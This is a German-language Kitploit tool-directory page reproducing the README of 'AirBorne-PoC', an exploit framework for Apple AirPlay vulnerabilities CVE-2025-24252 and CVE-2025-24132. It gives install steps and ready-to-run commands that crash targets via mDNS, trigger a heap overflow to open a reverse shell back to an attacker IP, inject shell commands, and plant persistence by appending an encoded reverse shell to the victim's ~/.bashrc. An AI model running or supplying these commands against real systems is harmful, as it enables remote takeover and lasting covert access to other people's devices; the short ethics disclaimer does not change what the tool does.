Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
AirBorne-PoC — PoC für CVE-2025-24252 & CVE-2025-24132 | Kitploit
Tools/GitHubGitHub/ekomssavior/airborne-poc
PersistenzmechanismenSchwachstellenanalyseExploitationShellcodePost-ExploitationCommand and ControlRemote-Access-ToolPayload-EntwicklungBinary-Exploitation
GitHubekomssavior/airborne-poc

AirBorne-PoC

PoC für CVE-2025-24252 & CVE-2025-24132

16427vor 7 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

AirBorne PoC Framework – Elite RCE Edition

Vollständiges PoC Framework für CVE-2025-24252 & CVE-2025-24132
Von ekomsSavior |

AirBorne ist ein kombiniertes Proof-of-Concept (PoC) Framework, das zwei schwerwiegende Schwachstellen im Apple AirPlay-Dienst adressiert. Es enthält einen vollständigen Crash-Trigger und einen funktionierenden Reverse-Shell-Exploit mit optionaler Persistenz, Listener und mehreren Payload-Formaten – alles in einem Skript.

Auf der Suche nach der Originalversion?
Die Legacy-Edition ist weiterhin im legacy Branch dieses Repositorys verfügbar.
Um sie auszuchecken:

root@kitploit:~
git checkout legacy

Behandelte CVEs

CVE-2025-24252 – mDNS TXT Record Absturz

  • Löst einen Absturz des AirPlayReceiver-Daemons durch ein fehlerhaftes mDNS-Paket aus.
  • Funktioniert über UDP-Broadcast auf Port 5353

CVE-2025-24132 – Heap Overflow → Reverse Shell (RCE)

  • Löst einen Heap-Overflow im AirPlay-TCP-Dienst auf Port 7000 aus.
  • Unterstützt Reverse-Shell-Payloads für bash, python und PowerShell.
  • Enthält optionale Persistenz mittels .bashrc-Injection (Linux).

Erste Schritte

1. Repo klonen

root@kitploit:~
git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC

2. Abhängigkeiten installieren

root@kitploit:~
sudo apt update
sudo apt install -y python3-scapy netcat

Ablauf zur Laufzeit

Das einzelne Skript airborne.py enthält beide PoCs und die gesamte Logik:

  • Wählen Sie eine CVE mittels --exploit aus
  • Legen Sie einen Reverse-Shell-Payload mittels --payload fest
  • Startet automatisch einen Netcat-Listener für Sie
  • Aktiviert optional Persistenz auf dem Ziel mittels --persistent

Anwendungsbeispiele

Ziel mit mDNS-Paket zum Absturz bringen (CVE-2025-24252)

root@kitploit:~
sudo python3 airborne.py --exploit 24252 --interface wlan0

Erfordert ein Interface im Monitor-Modus.


Heap Overflow → RCE starten (CVE-2025-24132)

Starten Sie den vollständigen Exploit mit der Standard-Bash-Shell:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99

Wählen Sie stattdessen die Python-Shell:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python

Aktivieren Sie echte Persistenz auf Linux-Zielen:

root@kitploit:~
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent

Nur Shell-Befehlseinschleusung

root@kitploit:~
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"

Payload-Optionen

PayloadBeschreibung
bashStandard-Bash-Reverse-Shell über TCP
pythonPython-basierte Reverse-Shell mit socket und pty

Persistenzmodus

Bei Verwendung von --persistent hängt das Skript den codierten Reverse-Shell-Payload an die folgende Datei des Ziels an:

root@kitploit:~
~/.bashrc

Dies stellt sicher, dass Ihnen jedes Mal eine Shell zurückgegeben wird, wenn der Benutzer sich anmeldet oder ein Terminal geöffnet wird.


Wartungshinweise

  • Reverse-Shells werden mit base64 codiert und nach dem Buffer-Overflow ausgeliefert.
  • Alle Payloads werden über Port 7000 gesendet.
  • mDNS-Pakete gehen über UDP 5353 und erfordern Raw-Socket-Berechtigungen.
  • Stellen Sie sicher, dass die IP Ihrer Angriffsbox vom Zielgerät erreichbar ist.
  • Das Skript behandelt grundlegende Fehlerfälle und schlägt bei geschlossenen Ports still fehl.

Ethischer Haftungsausschluss

Dieses Projekt ist ausschließlich für Bildungs-, ethische und autorisierte Forschungszwecke gedacht.

  • Sie müssen die ausdrückliche Erlaubnis haben, das Zielsystem zu testen.
  • Sie übernehmen die vollständige Verantwortung für alle ergriffenen Maßnahmen.

Unbefugte Ausnutzung von Systemen ist illegal und unethisch.


Danksagungen

  • Erstellt von ekomsSavior
  • Inspiriert von realen CVEs und Exploit-Entwicklungsforschung
Tool herunterladen
powershell
Vollständiger Windows PowerShell RCE-Payload (verschleiert)